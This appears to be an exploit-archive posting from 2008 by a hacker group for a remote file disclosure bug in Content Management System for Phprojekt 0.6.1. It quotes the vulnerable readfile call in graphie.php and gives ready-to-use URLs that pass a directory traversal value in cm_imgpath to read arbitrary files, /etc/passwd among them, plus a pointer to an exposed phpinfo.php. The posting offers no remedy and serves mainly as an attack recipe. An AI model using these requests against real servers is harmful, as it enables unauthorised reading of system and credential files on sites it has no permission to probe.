Content Management System for Phprojekt 0.6.1 File Disclosure Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Content Management System for Phprojekt 0.6.1 File Disclosure Vuln
# Published : 2008-04-27
# Author : Houssamix
# Previous Title : FluentCMS (view.php sid) Remote SQL Injection Vulnerability
# Next Title : Joomla Component com_alphacontent Blind SQL Injection Exploit

--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

= Author : HouSSaMix                          
= Script : 	Content Management System for Phprojekt
= version : 0.6.1
= Download : http://www.mariovaldez.net/software/cm_4p/download.php
      			           
							   
= BUG  :  Remote File Disclosure Vulnerability 

 Vulnerable CODE :
~~~~~~~~ graphie.php ~~~~~~~~~~~~~~~~~
readfile ($cm_imgpath . "/t.gif");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
variable " $cm_imgpath " not declared 	 

= Exploit :

target.com/cm/graphie.php?cm_imgpath=../.././../[file]
target.com/cm/graphie.php?cm_imgpath=../.././../etc/passwd

= see phpinfo 
target.com/cm/phpinfo.php



= greetz :	V40 - marwen.neo and all muslims Hackers

=================================================================================================================

# www.Syue.com [2008-04-27]